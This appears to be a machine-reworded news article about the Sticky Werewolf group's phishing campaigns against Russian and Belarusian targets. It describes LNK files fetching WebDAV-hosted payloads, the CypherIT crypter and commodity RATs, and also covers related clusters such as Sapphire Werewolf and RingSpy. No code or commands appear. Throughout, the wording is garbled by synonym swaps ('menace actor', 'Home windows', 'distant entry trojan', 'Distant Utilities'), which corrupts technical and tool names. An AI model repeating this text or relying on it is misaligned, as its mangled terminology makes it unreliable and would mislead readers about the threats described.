Cybersecurity researchers have disclosed particulars of a menace actor often known as Sticky Werewolf that has been linked to cyber assaults focusing on entities in Russia and Belarus.
The phishing assaults have been geared toward a pharmaceutical firm, a Russian analysis institute coping with microbiology and vaccine improvement, and the aviation sector, increasing past their preliminary focus of presidency organizations, Morphisec stated in a report final week.
“In previous campaigns, the infection chain began with phishing emails containing a link to download a malicious file from platforms like gofile.io,” safety researcher Arnold Osipov stated. “This latest campaign used archive files containing LNK files pointing to a payload stored on WebDAV servers.”
Sticky Werewolf, one of many many menace actors focusing on Russia and Belarus comparable to Cloud Werewolf (aka Inception and Cloud Atlas), Quartz Wolf, Crimson Wolf (aka RedCurl), and Scaly Wolf, was first documented by BI.ZONE in October 2023. The group is believed to be lively since a minimum of April 2023.
Earlier assaults documented by the cybersecurity agency leveraged phishing emails with hyperlinks to malicious payloads that culminated within the deployment of the NetWire distant entry trojan (RAT), which had its infrastructure taken down early final yr following a legislation enforcement operation.
The brand new assault chain noticed by Morphisec entails the usage of a RAR archive attachment that, when extracted, comprises two LNK recordsdata and a decoy PDF doc, with the latter claiming to be an invite to a video convention and urging the recipients to click on on the LNK recordsdata to get the assembly agenda and the e-mail distribution listing.
Opening both of the LNK recordsdata triggers the execution of a binary hosted on a WebDAV server, which ends up in the launch of an obfuscated Home windows batch script. The script, in flip, is designed to run an AutoIt script that finally injects the ultimate payload, on the identical time bypassing safety software program and evaluation makes an attempt.
“This executable is an NSIS self-extracting archive which is a part of a beforehand recognized crypter named CypherIT,” Osipov stated. “While the original CypherIT crypter is no longer being sold, the current executable is a variant of it, as observed in a couple of hacking forums.”
The top purpose of the marketing campaign is to ship commodity RATs and knowledge stealer malware comparable to Rhadamanthys and Ozone RAT.
“While there is no definitive evidence pointing to a specific national origin for the Sticky Werewolf group, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists, but this attribution remains uncertain,” Osipov stated.
The event comes as BI.ZONE revealed an exercise cluster codenamed Sapphire Werewolf that has been attributed as behind greater than 300 assaults on Russian schooling, manufacturing, IT, protection, and aerospace engineering sectors utilizing Amethyst, an offshoot of the favored open‑supply SapphireStealer.
The Russian firm, in March 2024, additionally uncovered clusters known as Fluffy Wolf and Mysterious Werewolf which have used spear-phishing lures to distribute Distant Utilities, XMRig miner, WarZone RAT, and a bespoke backdoor dubbed RingSpy.
“The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources,” it famous. “The backdoor’s [command-and-control] server is a Telegram bot.”
